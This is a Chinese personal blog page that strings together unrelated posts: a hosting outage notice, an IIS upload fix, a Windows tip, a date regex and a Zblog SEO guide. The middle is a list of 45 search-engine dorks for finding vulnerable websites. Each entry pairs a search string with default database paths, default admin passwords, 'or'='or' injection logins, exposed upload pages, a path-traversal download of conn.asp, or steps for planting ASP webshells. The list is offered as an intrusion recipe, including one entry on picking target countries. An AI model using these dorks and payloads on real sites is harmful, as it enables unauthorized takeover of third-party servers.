分类 [ 网络日志 ] 下的全部文章


  在这里对大家表示歉意,实属无奈。至发这篇日志时电信线路还是没有恢复,目前访问的是网通线路,典型用户可能会有点慢。也由于我做域名解析没做号,原本一直将域名解析到电信IP上,所以前段时间网通用户访问可能也会比较慢。今天改了域名解析,直接解析到别名上了,怎么说都是双线主机,不能浪费了。

  待电信线路修复过后,相信无论是电信线路的用户,还是网通线路的用户,都能快速的访问。

  引用服务商的公告如下,这个空间买了才一个星期,就出这情况,很无奈的说。主要是预计3小时却让我等了10个小时...这效率...


尊敬的用户您好:
  蓝月机房电信线路将在 2009-02-20 晚上9-10点断线整顿,时间约为三小时,请用户们将网站IP指向网通IP,做智能解析的本站将统一解析,此次断线主要是是为配合电信整顿违法低俗信息,给用户们带来的不便,敬请见谅。


到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!

2.
到Google ,site:cq.cn inurl:asp

3.
利用挖掘鸡和一个ASP木马.
文件名是login.asp
路径组是/manage/
关键词是went.asp
用'or'='or'来登陆

4.
关键字:Co Net MIB Ver 1.0网站后台管理系统

帐号密码为 'or'='or'


5.
动感购物系统
inurl:help.asp登陆,如未注册成为会员!

upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞


6.
默认数据库地址blogdata/acblog.asa
关键字:acblog

7.
百度 /htdocs
注册里可以直接上传asa文件!


8.
/Database/#newasp.mdb
关键词:NewAsp SiteManageSystem Version


9.
用挖掘机
关键字:Powered by WEBBOY
页面:/upfile.asp

10.
baidu中搜索关键字Ver5.0 Build 0519
(存在上传漏洞)

11.
Upfile_Article.asp bbs/upfile.asp
输入关键字:powered by mypower ,

12.
inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站

13.
现在GOOGLE搜索关键字 intitle:网站小助手 inurl:asp

14.
键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛

挖掘鸡的关键字 添 setup.asp


15.
VBulletin论坛的数据库
默认数据库地址!
/includes/functions.php
工具:
1.网站猎手 下载地址:百度 Google!
2.Google
关键字:
Powered by: vBulletin Version 3.0.1
Powered by: vBulletin Version 3.0.2
Powered by: vBulletin Version 3.0.3
其中一个就可以了

16.
1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart
open source。 这是一个商场系统。
2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~
猜到,comersus.mdb. 是数据库名
数据库都是放在database/ 后的,
所以database/comersus.mdb
comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。
那样把前一个''store/''除去,再加上database/comersus.mdb 试试

17.
无忧传奇官方站点程序。
1、后台管理地址:http://您的域名/msmiradmin/
2、默认后台管理帐号:msmir
3、默认后台管理密码:msmirmsmir
数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb
数据库连接文件为 ***********/Conn.asp

18.
百度里输入/skins/default/

19.
利用挖掘机
关键机:power by Discuz
路径:/wish.php
配合:
Discuz!论坛 wish.php远程包含漏洞 工具使用

20.
上传漏洞.
工具 : Domain3.5
网站猎手 1.5版
关键字powered by mypower
检测的页面或文件插入upfile_photo.asp


21.
新云漏洞
这个漏洞ACCESS和SQL版通吃。
Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录"
把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp
以源码,软件等下载站居多。
大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了
\database\%23newasp.mdb
如:#xzws.mdb 改成%23xzws.mdb

22.
通吃所有商城+动力上传系统

使用工具:挖掘鸡 v1.1 明小子
商城入侵:
关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
漏洞页面:upload.asp
upfile_flash.asp

动力入侵:
关键字:powered by mypower
漏洞页面:upfile_photo.asp
Upfile_Soft.asp
upfile_adpic.asp
upfile_softpic.asp

23.
注射漏洞
百度搜索:oioj's blog

24
动易
列目录
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp

25.
工具:网站猎手
关键词:inurl:Went.asp
后缀:manage/login.asp
口令:'or'='or'

26.
入侵魔兽私服
需要的工具:ASP木马一只。
Domain3.5明小子
关键字:All Right Reserved Design:游戏联盟
后台地址:admin/login.asp
数据库的地址:chngame/#chngame.mdb

27.
漏洞是利用管理员iis设置的失误
用baidu 关键字就是比较罕见的脚本名
动网: ReloadForumCache.asp
Leadbbs: makealltopanc.asp
BBSXP: admin_fso.asp
动易: admin_articlerecyclebin.asp

28.
国外站的爆库漏洞
关键字:sad Raven's Guestbook
密码地址:/passwd.dat
后台地址:/admin.php

29.
Discuz 4.1.0跨站漏洞
利用工具:1,WAP浏览器
2,WAP编码转换器
关键字:"intext:Discuz! 4.1.0"

30.
关键字:尚奈克斯
后台路径/system/manage.asp
直接传ASP木马

31.
工具
1:网站猎手
2:大马一个
关键字:切勿关闭Cookies功能,否则您将不能登录
插入diy.asp

32.
关键字:Team5 Studio All rights reserved
默认数据库:data/team.mdb

33.
工具: 挖掘机 辅臣数据库读取器
关键字: 企业简介 产品展示 产品列表
后缀添加: /database/myszw.mdb
后台地址: admin/Login.asp

34.
关键子 XXX inurl:Nclass.asp
在"系统设置"里写个木马。
会被保存到 在 config.asp内。

35.
不进后台照样拿动网WEBSHELL
data.asp?action=BackupData 动网数据库备份默认路径

36.
工具:网站猎手 WebShell
关键字:inurl:Went.asp
后缀:manage/login.asp
弱口令:'or'='or'

37.
关键字:Powered by:QCDN_NEWS
随便扫遍文章加一个' ,来试探注入点
后台地址:admin_index.asp

38.
入侵雷池新闻发布系统
关键字:leichinews
去掉leichinews后面的.
打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
再上传马.....
进访问uppic anran.asp 登陆马.

39.
关键字:Power System Of Article Management Ver 3.0 Build 20030628
默认数据库:database\yiuwekdsodksldfslwifds.mdb
后台地址:自己扫描!

40.
一、通过GOOGLE搜索找大量注入点
关键字:asp?id=1 gov.jp/ asp?id=
页数:100
语言:想入侵哪个国家就填什么语言吧

41.
关键字:Powered by:94KKBBS 2005
利用密码找回功能 找回admin
提问:ddddd 回答:ddddd

42.
关键字:inurl:Went.asp
后台为manage/login.asp
后台密码: 'or'=' 或者 'or''=''or' 登录 进入
默认数据库地址:Database/DataShop.mdb

43.
关键字:****** inurl:readnews.asp
把最后一个/改成%5c ,直接暴库,看密码,进后台
随便添加个新闻 在标题输入我们的一句话木马

44.
工具:一句话木马
BBsXp 5.0 sp1 管理员猜解器
关键词:powered by bbsxp5.00
进后台,备份一句话马!

45.
关键字:程序核心:BJXSHOP网上开店专家
后台:/admin



解决ASP无组件上传错误:
Request 对像 错误 'ASP 0104 : 80004005' 不许操作

症状:
上传文件到 Windows 2003 Server + IIS 6.0 服务器的时候遇到错误
请求对像错误 'ASP 0104 : 80004005'
操作被禁止
/Upload.asp, line 40

原因:
IIS6.0 禁止上传超过 200kB 的文件. 因此你需要修改 IIS 的默认设置.

技术背景:
在 IIS 6.0 中, AspMaxRequestEntityAllowed 属性指定了一个 ASP 请求(Request)可以使用的最大字节数. 如果 Content-Length 头信息中包含的请求长度超过了 AspMaxRequestEntityAllowed 的值, IIS 将返回一个 403 错误信息.
这个属性值与 MaxRequestEntityAllowed 相似, 但是是针对 ASP 请求的. 假如你知道自己的 ASP 应用只需要处理很少的请求数据, 你可以在 World Wide Web Publishing Service (WWW 发佈服务)层级设定全局的 MaxRequestEntityAllowed 属性为 1MB, 并单独设定 AspMaxRequestEntityAllowed 为一个较小的值.

解决方法:
打开位于 C:\Windows\System32\Inetsrv 中的 metabase.XML, 并修改 AspMaxRequestEntityAllowed 为你需要的值(例如 51200000, 50MB).

注意: 在编辑文件前如果没有停止 IIS 服务, 则无法保存修改后的文件

若你想在iis运行的时候修改其配置文件,则打开iis管理器,打开internet信息服务属性面板,钩选「允许直接编辑配置数据库,允许在iis运行时编辑iis配置数据库配置文件」




  在没有工具的环境下怎么实现批量旋转图片?这种问题在网络发达的今天可以在网上搜相关图片处理工具来解决,但是在没有网络的情况下又需要这个功能应该怎么办呢?办法是有的,前提是你使用的系统是 Windows XP 以上的版本。
  首先打开你将要旋转图片的文件夹,再将查看方式设置为“缩略图”,然后按住[Alt]+鼠标左键批量选择你将要处理的图片,选择完毕之后在任意一张选中的图片上单击鼠标右键,最后根据需要,选择菜单中的“顺时针旋转”或“逆时针旋转”后稍等片刻等待系统处理完成。
  此方法无需在依靠第三方软件来完成,简单、方便、快速、绿色。 ^_^



下面这条正则表达式牛啊,判断YYYY-MM-DD这种格式的,基本上把闰年和2月等的情况都考虑进去了:

^((((1[6-9]|[2-9]\d)\d{2})-(0?[13578]|1[02])-(0?[1-9]|[12]\d|3[01]))|(((1[6-9]|[2-9]\d)\d{2})-(0?[13456789]|1[012])-(0?[1-9]|[12]\d|30))|(((1[6-9]|[2-9]\d)\d{2})-0?2-(0?[1-9]|1\d|2[0-8]))|(((1[6-9]|[2-9]\d)(0[48]|[2468][048]|[13579][26])|((16|[2468][048]|[3579][26])00))-0?2-29-))$


JiaJia: 我看到这一串东西,彻底无语...暴强~乱得我都看不下去了...



最近在研究本站优化的时候,发现本站内容不足,于是决定采取增加BLOG的策略。但,天下之大,BLOG程序之多,到底用那款BLOG程序,一时间,摸不到头脑。结合SEO经验与自身实力,决定采用Zblog程序—自认为是优化做的很不错的网站,也是普通SEOER的首选,我是新手,所以我选择。

以下谈谈我对Zblog程序优化的一点点看法,也是本站优化的一个:

一、Zblog的结构

(1)关于模板文件的说明,Zblog的模板文件都放在Template目录下面,但其中比较重要值得优化的有几个
default.html 首页的模板
single.html 单个文章页面模板
b_article-single.html 单个文章页面之中的文章主体部分,single.html里面的文章内容就是嵌用了这个的格式。
catalog.html 用于首页的翻页,也就是说首页从第二页开始,都是这个负责显示

(2)关于Zblog的几个常用标签

<#ZC_BLOG_HOST#>     代表博客的根网址
<#ZC_BLOG_TITLE#>    代表博客网站名称,在后台可以设置
<#ZC_BLOG_SUBTITLE#> 网站副名称,同样在后台可以找到
<#BlogTitle#>        代表单个文章的主标题
<#article/tagtoname#>  该文章的标签
<#article/intro#>    该文章的简介部分
<#CACHE_INCLUDE_文件名#> 此标签作用是包含外部文件,很实用。例如<#CACHE_INCLUDE_ABCDEFG#>这个意思就是把“INCLUDE”目录下的“ABCDEFG.ASP"文件内容弄进来,首页模板里面的侧边“网站收藏”“友情链接”“图标集”等都是用这个标签搞的,你可以打开“INCLUDE”目录看看里面文件的内容研究研究



二、Zblog模板的优化

(1)Zblog 的默认模板里面是没有 keywords,description,generator 这几个meta的 !

首先要把这几个加回去,主要是针对单个文章页面,也就是single.html

至于首页的两个default.html和catalog.html加不加上去,看个人喜欢了,我自己是比较懒的。

Single.html 要添加的Meta可以这样加:(只是样例)

<meta name="keywords" content="<#article/tagtoname#>"/>
<meta name="description" content="<#article/intro#>"/>


经过第一部分的网站优化过程,聪明的你很快就明白这两行字的意思。其中所用的标签就是上面所提到的标签:关键词和简介。

其中要严重注意的一点,就是上面那个description里面的标记“<#article/intro#>”,这个简介不应该有任何HTML标签,尤其是不能包含有英文的双引号“,因为他们是放在页面的head区的,里面包含Html标签很容易导致显示出问题。本来它只应该是一段纯粹的文字,但在我们平时在写Blog的时候,经常会漏写或者把简介也加上了许多效果,导致文章简介有很多HTML标签存在,这个只能靠你平时的写文章习惯。

有的朋友可能会说,这个简介放在description这里这么危险干脆不要吧,我本人也严重同意,但不要它,没有谁能代替啊,除非你改动程序,改动数据库加上一个新的“文章描述”那我没有意见。为了以后的升级兼容,先将就一下吧。或者你比较狠点,可以干脆点不要这一行description。我这里给出一个折衷点的办法就是,你要加上Html标签也可以,但是平时写文章要记得把简介里面的所有的双引号“替换为单引号‘,至少我现在已经在这样做还没有出现过问题。希望作者能在下个版本中弄个直接用于description的标签。

首页的meta就没有那么复杂了,写上你的网站描述和关键词就ok。

(2)仍然是单个文章页面(Single.html),它的Title部分也不太理想。原来的Title是这样的

<title><#ZC_BLOG_TITLE#><#ZC_MSG044#><#BlogTitle#></title>


可以看到,它的格式是 "博客名称-文章标题”,而越左边是越重要的,应该改成"文章标题-博客名称”。这个容易解决,把位置调换一下就行了。新的title如下:

<title><#BlogTitle#><#ZC_MSG044#><#ZC_BLOG_TITLE#></title>


(3)还是单个文章页面(Single.htm),我并不是对它有偏见,其实首页(default.html和catalog.html)也有这个问题.
就是关于h1和h2的使用,

在标准化里面的意义是表示标题,而并不是用来弄大小。Zblog里面,用h1显示了网站名称,用h2显示副标题。但显然把这个h1留给文章的标题更加合适。于是,你可以在single.html default.html catalog.html三个文件中找到:

<h1 id="BlogTitle"><a href="<#ZC_BLOG_HOST#>"><#ZC_BLOG_NAME#></a></h1>
<h2 id="BlogSubTitle"><#ZC_BLOG_SUB_NAME#></h2>


怎么改好呢?又不能和原来的相差太远。幸好Zblog模板采用Xhtml + CSS来控制显示的,我们可以把h1和h2换成div, 或者改成span。用Div是比较理想的,和原来的h1同样是盒状的block。ID="BlogTitle"保持不变。
于是代码换成

<div id="BlogTitle"><a href="<#ZC_BLOG_HOST#>"><#ZC_BLOG_NAME#></a></div>
<div id="BlogSubTitle"><#ZC_BLOG_SUB_NAME#></div>


效果仍然和有点区别的,就是div没有附带大小样式,而h1里面的文字是默认比较大的。这点改动已经不太兼容了,因为还要去CSS修改一下文字大小。
为了保持兼容性,我们可以采取另一个折衷点的,就是h1换成h2,h2换成h3。新的代码是

<h2 id="BlogTitle"><a href="<#ZC_BLOG_HOST#>"><#ZC_BLOG_NAME#></a></h2>
<h3 id="BlogSubTitle"><#ZC_BLOG_SUB_NAME#></h3>


这样子文字大小会比原来小一点,但是仍然能兼容网上大部分的模板样式。
把h1从网站名手里抢过来以后,还要把它还给文章的标题。ZBlog默认模板分给文章标题的是h2,又是把h2它当成大小控制来使用。

<h2 class="post-title"><#article/title#></h2>


这个我们简单地把h2 改为h1就行了。当然,文字会比原来的再大一点。
(4)关于怎么在ZBlog里面加Adsense广告
由于Zblog的模板文件化,只要你懂点HTML代码,放广告是很自由的事,基本上每个地方都可以放。我这里只简单说下如何在单个文章的正文中放一个Adsense Content。我们要利用的主角是上面提到的<#CACHE_INCLUDE_文件名#> 标签。
A. 在INCLUDE目录下面新建一个ASP文件,例如"GGADCONTENT.ASP"。然后把Adsense生成的代码直接粘贴进取,不需要再添加任何文字。然后保存。
B. 打开"
Template"目录里面的"b_article-single.html"文件,找到这行:

<div class="post-body"><#article/content#></div>


把它换成下面的几行:

<div class="post-body">
<div class="ggad-content">
<#CACHE_INCLUDE_GGADCONTENT#>
</div>
<#article/content#>
</div>


“GGADCONENT”就是刚才A步骤建立的“GGADCONTENT.ASP”,只要文件名就可以了。同时,上面的代码还定义了一个名为“ggad-content”的样式类。所以还要到C步骤去搞搞它的样式。
C. 打开"STYLE"目录下的"default.css" (我这里用默认CSS做例子),实际应用看你选择了什么样的模板,相对应的CSS文件。
在这个CSS文件的最末端加入一下代码,而不需要修改其它的地方。

/* GG Adsense Style Control */
.ggad-content {float:left;}


这句CSS的意思是让装着Adsense广告的那个层流动到左边,它会自动把文章正文的文字挤到右边。你也可以把"left"字母改成"right",则设为浮动到右边。在后台重新生成索引和重新生成文件。如果你在网上修改,还要记得把INCLUDE里面新建的那个文件ftp到你的网站空间去。
(5). 关于用目录来做文章的访问路径问题,以及自定义文章名称。
官方已经注意到文章访问路径的优化了,并且在后台加入了这两个功能,有兴趣的可以进一步参考ZBlog的官方论坛,我就不再罗嗦了。不过有一点要注意,如果你启用了这个功能后,以前的文章访问路径都会发很大的变化,直接结果就是导致搜索引擎的收录地址和你的新地址对不上号!要过一段痛苦的收录周期才会逐渐恢复收录正常。

三、后记

其实ZBlog的SEO方面已经做得很好了,内部连接、静态输出等方面很不错,所以深得SEOer们的喜爱。因此我这里所改的也都是小打小闹,一般情况下,为了保持兼容避免麻烦,再加上现在这几个地方的权重不那么高了,都不需要怎么修改。如果说非得要改的,那就是title那里要把文章标题换到网站名称前面去。ZBLog的作者是单枪匹马开发出这个东西的,做到这种地步已经很牛了~不过仍然希望下个补丁改一改这些小问题。ZBlog对于国内空间来说很不错的,因为到处都是ASP空间。相比之下wordpress需要php+mysql,我也不清楚为什么PHP空间在中国不太流行,虽然wordpress的确是最好的Blog程序。
比较一下Zblog和Pjblog,各有所长,PJ是LBS基础上开发的,使用的也是动态的ASP,因此功能比较强大,主题模板也很丰富,但是多余的代码也不算少。另外那个作者被腾讯吸收去搞Qzone后,已经多月没有更新过了。PJ的建站要求很低,很适合个人新手建Blog。相比起PJ,ZBLOG简洁而自由,占用资源也少,但也需要一定的网页制作基础。那个“重建文件”功能比较耗资源,但这个也没办法,生成静态文件就必须这样。

Ps:这也是JiaJia将原有的PJ转为ZB的原因,ZB的速度挺好的,功能很简洁。



【2009-02-12】
  原来一直用的PJBlog,但是现在不想用了,越高越复杂,我还是喜欢简单一点的东西,所以用了ZBlog。所在的空间不是双线的,这次换了个双线的,感谢一直以来 Smallrascal 的照顾。
  不过这次换空间换博客程序损失还是比较大的,所有的文章全部丢失,收工录入编程部分日志花了我3天的时间重新排版编辑。其他文章我正在筛选,部分过时的文章和不好的文章就删除了。
  毕业了(准毕业生),无业游民,压力比较大,脾气变暴躁了,明显体现在跟网友说话时,很不耐烦。批评自己一下,努力改正错误,改变心态。专心做好现在手上的事情,不多想了。此博客还是不作为私人日记发布处,主要路线是给大家提供好的软件,就是这样。

--------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------


友情链接:
  以前的友情链接很多无效的,请朋友们看到该条消息请在这里再申请一次,呃...麻烦大家了...
  同时也欢迎流量1000IP正规健康内容的博客做友情链接,PR值当然越高越好啦,哈哈哈。、

管理员:
  喜欢本站的,支持加加的,有时间可以贡献的,可以考虑一下申请本站的管理员,也是留言申请。
  自我认为很有能力的,我可以有偿聘请管理本站。佣金QQ详谈...比较少的...

求软件:
  需要某种软件,某些功能,但是自己又找不到适合的。
  那么朋友们,你们可以在这里留言,我尽力帮大家解决问题。
  注意,相关软件必须是正规合法软件...